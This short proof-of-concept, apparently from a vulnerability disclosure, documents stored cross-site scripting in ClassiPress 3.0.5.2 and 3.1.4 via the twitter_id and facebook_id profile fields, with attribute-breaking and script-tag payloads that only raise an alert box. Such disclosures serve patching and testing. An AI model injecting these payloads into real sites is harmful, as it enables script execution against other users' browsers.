Proof-of-Concept Code:
-------------------------
Insertion page: http://www.example.com/author/profile/
Infected page : http://www.example.com/author/attacker_username/
Note: Some sites replace "author" with another path, this is not a vanilla configuration, however.
Version: ClassiPress 3.0.5.2
Vulnerable Input Parameters:
twitter_id: " onmouseover="alert('XSS');
facebook_id: " onmouseover="alert('XSS');
Alternate Exploit code:
twitter_id: "><script>alert('XSS');</script><div id="
facebook_id: "><script>alert('XSS');</script><div id="
Version: ClassiPress 3.1.4
Vulnerable Input Parameters:
twitter_id: " onmouseover='alert("XSS");'><
facebook_id: " onmouseover='alert("XSS");'><